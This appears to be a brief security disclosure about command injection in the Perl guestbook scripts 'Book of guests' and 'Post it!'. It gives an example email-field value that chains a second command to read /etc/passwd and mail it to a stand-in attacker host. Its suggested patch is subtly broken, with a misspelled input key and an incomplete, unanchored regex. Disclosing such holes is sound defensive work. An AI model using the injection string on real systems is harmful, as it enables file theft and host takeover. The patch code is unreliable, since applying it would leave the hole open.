hi all I found a security hole in Book of guests and Post it! written by Seth Leonard. It is available at http://www.dreamcachersweb.com The problem is that this script doesn't filter out ANY metacharacters from the input and pass it to the shell. Therefore by writing something like email@mail.com;cat /etc/passwd|mail evil@evilhost.com into the email field, the attacker could take control over the host. patch: first of all it isn't a bad idea to set the permissions of the script corectly. Furthermore the line if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... } should be replaced by something like if ($INPUT{'emai'} =~ /^[\w-.]+\@[\w-.]) { ... } David Kumme, 16
